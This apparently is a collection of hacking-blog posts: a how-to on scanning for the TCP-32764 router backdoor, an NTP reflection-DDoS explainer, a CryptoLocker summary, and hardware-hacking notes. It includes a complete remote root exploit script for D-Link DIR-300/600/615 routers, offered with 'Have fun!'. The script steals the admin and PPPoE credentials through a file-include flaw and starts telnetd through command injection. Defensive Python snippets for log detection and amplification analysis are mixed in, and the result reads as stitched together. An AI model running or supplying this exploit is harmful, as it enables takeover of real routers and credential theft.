[HOWTO] Searching the internet for the TCP-32764 netgear exploit

This is a backdoor from last month. You can find it on GitHub.
Here, I'll describe a quick and dirty way to search the internet for this exploit.

This exploit allows complete control of the affected host. You can download/upload files, get a root shell, PPPoE credentials, admin password, etc.

The idea was originally posted here; however, the post didn't describe how to do it. So I'll write a very quick post on how to do it.

DISCLAIMER: educational purposes only. Use at your own risk. I only wrote the minimalist bash script and the how to.

Some more info from the author of the exploit.

Probable source of the backdoor:

Backdoor LISTENING ON THE INTERNET confirmed in:

  • Linksys WAG120N (@p_w999)
  • Netgear DG834B V5.01.14 (@domainzero)
  • Netgear DGN2000 1.1.1, 1.1.11.0, 1.3.10.0, 1.3.11.0, 1.3.12.0 (issue 44)
  • Netgear WPNT834 (issue 79)
  • OpenWAG200 maybe a little bit TOO open 😉 (issue 49)

Backdoor confirmed in:

Backdoor may be present in:


D-Link DIR-300, DIR-600, DIR-615 (fw 4.0) remote root exploit

This is a remote root exploit for D-Link wireless routers DIR-300 (all versions), DIR-600 (all versions), DIR-615 (fw 4.0).

Have fun!

#!/bin/sh

if [ -z "$1" ]; then
  echo "d-link DIR-300 (all), DIR-600 (all), DIR-615 (fw 4.0)";
  echo "exploited by AKAT-1, 22733db72ab3ed94b5f8a1ffcde850251fe6f466, c8e74ebd8392fda4788179f9a02bb49337638e7b";
  echo "usage: $0 [router address] [telnet port]";
  exit 0;
fi;

# Port the telnet daemon will be started on (defaults to 3333)
if [ -z "$2" ]; then
  TPORT=3333;
else
  TPORT=$2;
fi

UPORT=31337;

echo "Trying $1 ...";

# Step 1: fetch /var/etc/httpasswd through __show_info.php's REQUIRE_FILE parameter
# (no login yet) and split the "user:password" line into two words
HTTPASSWD=`curl -sS "http://$1/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd" | grep -A1 "<center>" | tail -1 | sed -e "s/\t//g ; s/^\([^:]*\):\([^:]*\)$/\1\n \2/g"`;

if [ ! -z "$HTTPASSWD" ]; then
  L=`echo $HTTPASSWD | cut -d' ' -f1`;
  P=`echo $HTTPASSWD | cut -d' ' -f2`;

  echo "found username: $L";
  echo "found password: $P";

  # Step 2: log in to the web interface with the recovered credentials
  curl -d "ACTION_POST=LOGIN&LOGIN_USER=$L&LOGIN_PASSWD=$P" -sS "http://$1/login.php" | grep -v "fail" 1>/dev/null;

  if [ $? -eq 0 ]; then
    # Step 3: tools_system.xgi runs whatever exeshell= names; open the two ports in the
    # NAT chain and start telnetd with a fixed login
    curl -sS "http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/iptables -t nat -A PRE_MISC -i eth0.2 -p tcp --dport $TPORT -j ACCEPT&set/runtime/syslog/sendmail=1" 1>/dev/null;
    curl -sS "http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/iptables -t nat -A PRE_MISC -i eth0.2 -p tcp --dport $UPORT -j ACCEPT&set/runtime/syslog/sendmail=1" 1>/dev/null;
    curl -sS "http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/telnetd -p $TPORT -l /usr/sbin/login -u hacked:me&set/runtime/syslog/sendmail=1" 1>/dev/null;

    echo "if you are lucky telnet is listening on $TPORT (hacked:me) ..."
    curl -sS "http://$1/logout.php" 1>/dev/null;
  fi
fi

# Step 4: the same file include also exposes the PPP/PPPoE credentials
CHAP=`curl -sS "http://$1/model/__show_info.php?REQUIRE_FILE=/etc/ppp/chap-secrets" | grep -A1 "<center>" | sed -e "s/<center>//g"`;

if [ ! -z "$CHAP" ]; then
  echo "found chap-secrets: $CHAP";
fi

echo "Bye bye.";

exit 0;
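From the defender's side, the requests the script above issues leave a recognisable trail in a web access log, assuming one is collected (for instance by a proxy or sensor in front of the device). The following Python is an added example, not the exploit author's code and not part of the original post: it parses Common Log Format lines and flags the two request shapes the script uses, __show_info.php with a REQUIRE_FILE parameter and tools_system.xgi with an exeshell parameter. The log lines, timestamps and IP addresses are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (Common Log Format). The request paths mirror the ones the
# exploit script issues; the addresses and timestamps are made up for this example.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2014:12:00:01 +0000] "GET /model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd HTTP/1.1" 200 512
203.0.113.7 - - [10/Jan/2014:12:00:02 +0000] "POST /login.php HTTP/1.1" 200 1024
203.0.113.7 - - [10/Jan/2014:12:00:03 +0000] "GET /tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/telnetd%20-p%203333%20-l%20/usr/sbin/login%20-u%20hacked:me&set/runtime/syslog/sendmail=1 HTTP/1.1" 200 0
203.0.113.7 - - [10/Jan/2014:12:00:04 +0000] "GET /model/__show_info.php?REQUIRE_FILE=/etc/ppp/chap-secrets HTTP/1.1" 200 300
192.0.2.10 - - [10/Jan/2014:12:05:00 +0000] "GET /index.php HTTP/1.1" 200 2048
"""

# One Common Log Format record: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)


def parse_log_line(line):
    """Parse one log line into a dict with the path and decoded query parameters, or None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    return rec


def classify_request(rec):
    """Return a finding label for a parsed request, or None if it matches neither pattern."""
    path, query = rec["path"], rec["query"]
    if path.endswith("/model/__show_info.php") and "REQUIRE_FILE" in query:
        return "file disclosure via REQUIRE_FILE: " + query["REQUIRE_FILE"][0]
    if path.endswith("/tools_system.xgi") and "exeshell" in query:
        return "command execution via exeshell: " + query["exeshell"][0]
    return None


def scan_log(text):
    """Run the classifier over every line and collect the findings in log order."""
    findings = []
    for line in text.splitlines():
        rec = parse_log_line(line)
        if rec is None:
            continue
        label = classify_request(rec)
        if label:
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "finding": label})
    return findings


def sources_by_finding_count(findings):
    """Source addresses ranked by how many flagged requests they sent."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return sorted(counts.items(), key=lambda kv: -kv[1])


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["finding"])
    print("by source:", sources_by_finding_count(scan_log(SAMPLE_LOG)))
```

The classifier keys on the parameter names rather than on specific file paths or commands, so it still fires when the REQUIRE_FILE or exeshell value differs from the ones in the script; the decoded value is carried into the finding so an analyst can see what was requested.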

NTP based DDoS attack – understanding NTP reflection

Behind a reflection attack

A reflection attack works when an attacker can send a packet with a forged source IP address. The attacker sends a packet apparently from the intended victim to some server on the Internet that will reply immediately. Because the source IP address is forged, the remote Internet server replies and sends data to the victim.

That has two effects: the actual source of the attack is hidden and is very hard to trace, and, if many Internet servers are used, an attack can consist of an overwhelming number of packets hitting a victim from all over the world.

But what makes reflection attacks really powerful is when they are also amplified: when a small forged packet elicits a large reply from the server (or servers). In that case, an attacker can send a small packet “from” a forged source IP address and have the server (or servers) send large replies to the victim.

Amplification attacks like that result in an attacker turning a small amount of bandwidth coming from a small number of machines into a massive traffic load hitting a victim from around the Internet. Until recently the most popular protocol for amplification attacks was DNS: a small DNS query looking up the IP address of a domain name would result in a large reply.

NTP DDoS Amplification Attack

For DNS the amplification factor (how much larger a reply is than a request) is 8x. So an attacker can generate an attack 8x larger than the bandwidth they themselves have access to. For example, an attacker controlling 10 machines with 1Gbps could generate an 80Gbps DNS amplification attack.

In the past, we’ve seen one attack that used SNMP for amplification: it has a factor of 650x! Luckily, there are few open SNMP servers on the Internet and SNMP usually requires authentication (although many are poorly secured). That makes SNMP attacks relatively rare.

The new kid on the block today is NTP.
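As an added worked example, not part of the original post, the following Python turns the definitions above into something a defender can run over their own traffic records: it computes the amplification factor (reply size over request size), applies it to the bandwidth arithmetic in the text, aggregates constructed request/reply records per server and service to find which services answer small queries with large replies, and lists the "source" addresses that hit several such amplifiers, which from a reflector's vantage point are the likely forged victims rather than the attacker. The flow records, addresses and byte counts are constructed; the 64-byte request / 512-byte reply pairs echo the 8x DNS figure and the SNMP pair the 650x figure given above.

```python
from collections import defaultdict

# Constructed UDP request/reply records: (source_ip, server_ip, service, request_bytes, reply_bytes).
# Byte counts are made up for illustration, not measurements of real NTP/DNS/SNMP servers.
SAMPLE_FLOWS = [
    ("198.51.100.5", "192.0.2.53", "dns", 64, 512),
    ("198.51.100.5", "192.0.2.53", "dns", 64, 512),
    ("203.0.113.9", "192.0.2.53", "dns", 64, 128),
    ("198.51.100.5", "192.0.2.123", "ntp", 50, 2500),
    ("198.51.100.5", "192.0.2.124", "ntp", 50, 2500),
    ("198.51.100.5", "192.0.2.161", "snmp", 60, 39000),
    ("203.0.113.9", "192.0.2.80", "http", 300, 600),
]


def amplification_factor(request_bytes, reply_bytes):
    """Reply size divided by request size: how much larger a reply is than the request."""
    if request_bytes <= 0:
        raise ValueError("request_bytes must be positive")
    return reply_bytes / request_bytes


def attack_bandwidth_gbps(machines, gbps_per_machine, factor):
    """Traffic an attacker with the given machines can aim at a victim via reflectors."""
    return machines * gbps_per_machine * factor


def summarize_amplifiers(flows, threshold=5.0):
    """Aggregate per (server, service): overall factor, distinct sources, and whether the
    service amplifies beyond the threshold. Sorted from largest factor down."""
    agg = defaultdict(lambda: {"req": 0, "rep": 0, "sources": set()})
    for src, server, service, req, rep in flows:
        a = agg[(server, service)]
        a["req"] += req
        a["rep"] += rep
        a["sources"].add(src)
    rows = []
    for (server, service), a in agg.items():
        factor = amplification_factor(a["req"], a["rep"])
        rows.append({
            "server": server,
            "service": service,
            "factor": round(factor, 1),
            "sources": len(a["sources"]),
            "amplifier": factor >= threshold,
        })
    rows.sort(key=lambda r: -r["factor"])
    return rows


def spoofed_source_suspects(flows, threshold=5.0, min_servers=2):
    """Sources whose requests reach several amplifying servers. Because the reply goes to the
    source address, a source that fans out across amplifiers is the likely forged victim."""
    hits = defaultdict(set)
    for src, server, service, req, rep in flows:
        if amplification_factor(req, rep) >= threshold:
            hits[src].add(server)
    return sorted(src for src, servers in hits.items() if len(servers) >= min_servers)


if __name__ == "__main__":
    print("10 machines x 1 Gbps x 8 =", attack_bandwidth_gbps(10, 1, 8), "Gbps")
    for row in summarize_amplifiers(SAMPLE_FLOWS):
        print(row)
    print("likely forged sources:", spoofed_source_suspects(SAMPLE_FLOWS))
```

The threshold of 5x is a constructed cut-off for the example; what matters operationally is the ordering, which puts the services that give the attacker the most leverage at the top of the list to be rate-limited or closed to the public.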

Cuckoo Sandbox – A malware analysis system

Throw any suspicious file at it and in a matter of seconds Cuckoo will return detailed results outlining what the file did when executed inside an isolated environment.
Cuckoo is free Open Source software.

Cuckoo

Why does this matter?

Malware is the Swiss Army knife of cybercriminals and of any other adversary to your corporation or organization.

In these evolving times, detecting and removing malware artifacts is not enough: it's vitally important to understand how they work, what they did or would do on your systems once deployed, and the context, motivations and goals of a breach.

In this way you are able to more effectively understand the incident, respond to it and protect yourself for the future.

http://www.youtube.com/watch?v=720Vh3FaGN8

There are countless other contexts where you might need to deploy a sandbox internally, from analyzing an internal breach to proactively scouting widely distributed threats, collecting actionable data and analyzing the threats actively targeting your infrastructure or products.

In any of these cases you’ll find Cuckoo to be perfectly suitable, incredibly customizable and well… free!

Head over to Cuckoo’s website to learn more: http://cuckoosandbox.org

Hacking Aux-IN to a car’s CD player

I've seen this a few times, and it's a hack worth sharing.

Many of us own a car with a CD player but no AUX-IN. Who uses CDs these days, anyway? Noah decided to un-crapify the car audio on his 2001 Ford Focus.

The hack itself is pretty simple. Open up the unit, and you’ll find two separate modules: CD player, and radio/amplifier unit. Both are connected through a flex cable.

Taping the CD Player

Noah was fortunate: the board had taps for each pin, so he didn't have to solder directly onto the plug's pins. He identified ROUT, LOUT and a ground connection, soldered leads to them, and was ready to go.
Since he tapped the CD player's pins, a CD must be inserted in order to activate the input.
That is as easy as burning an audio CD without any tunes on it: plain old silence.

Similar hacks:


Reverse engineering a Hit Clip

You should read this excellent article on reverse engineering a Hit Clip.

Hit Clips were small, cheap digital audio players that could play music off little plastic cartridges. The audio was mono, sounded terrible, and only included a 60 second sample of a single song.

Head over here for more: http://ch00ftech.com/2013/12/31/reverse-engineering-a-hit-clip/ .

Hacking MicroSD cards

You should read the latest on hacking MicroSD cards by Bunnie Studios (http://www.bunniestudios.com/blog/?p=3554).

Some points to consider:

  • Every card has an ARM microcontroller;
  • Flash is usually bad, but it doesn't go to waste: a 16GB card with 80% bad flash can be sold as a 2GB one;
  • Remember point 1? That microcontroller can allow arbitrary code execution.
MicroSD Card controller

Interested in reading more?

This is the whole write up – http://bunniefoo.com/bunnie/sdcard-30c3-pub.pdf – and here’s the whole video. Enjoy!

Decoding OWL CM130 wireless monitor signal

So, I have an OWL CM130 wireless energy monitor for keeping an eye on power consumption at home.
It's a great little gadget, but also a very cheap one: I bought it a few years ago for around 30€ on eBay, but it won't let me do anything with the data other than display it.

The OWL CM130 kit

These usually work in the 433MHz band, and I happen to have a 433MHz AM receiver similar to this one:
http://ardumarket.com/en/transmisors/transmisor-rf-fs1000a-330-443mhz-arduino-pic-id19.html

And this is the pinout:

FS1000A 433MHz receiver and transmitter pinout

So, I thought "This is a no-brainer"!


CryptoLocker Ransomware

Background

In mid-September 2013, the Dell SecureWorks CTU(TM) research team observed a new ransomware malware family called CryptoLocker. Ransomware malware such as Reveton, Urausy, Tobfy, and Kovter has cost consumers considerable time and money over the past several years. Ransomware prevents victims from using their computer normally (e.g., by locking the screen) and uses social engineering to convince victims that failing to follow the malware authors’ instructions will lead to real-world consequences. These consequences, such as owing a fine or facing arrest and prosecution, are presented as being the result of a fabricated indiscretion like pirating music or downloading illegal pornography. Victims of these traditional forms of ransomware could ignore the demands and use security software to unlock the system and remove the offending malware. CryptoLocker changes this dynamic by aggressively encrypting files on the victim’s system and returning control of the files to the victim only after the ransom is paid.

Infection vector

The earliest CryptoLocker samples appear to have been released on the Internet on September 5, 2013. Details about this initial distribution phase are unclear, but it appears the samples were downloaded from a compromised website located in the United States, either by a version of CryptoLocker that has not been analyzed as of this publication, or by a custom downloader created by the same authors.

[Tutorial] Your own private anonymizing proxy – Raspberry Pi / TOR based

This howto uses the Raspberry Pi as the base system (tutorial is based on Debian), and Tor as the SOCKS5 Proxy.

The objective: be anonymous on the internet, using the Raspberry Pi as a transparent SOCKS 5 proxy.

I didn't intend this to be a completely exhaustive tutorial, but I feel it's complete enough for the novice user to follow.

As a bonus, I've added info on how to use Tor as a SOCKS proxy for your iPhone/iPad, with no need to jailbreak.

If in any doubt following this guide, please leave a comment!

Introduction

Sometimes you need to anonymize yourself on the internet. Or you're just paranoid and don't want to be followed around.

Either way, a proxy is a great way to stay anonymous on the internet.

If you just want to browse around, you can download a full-featured package with Tor and its own stripped-down version of Firefox, called TorBrowser. There are versions for Linux, OS X, and Windows, and you're ready to go.

But if you don't want to install anything on every device you own, or you want to be anonymous on your iPhone or Android device, then this tutorial is for you.
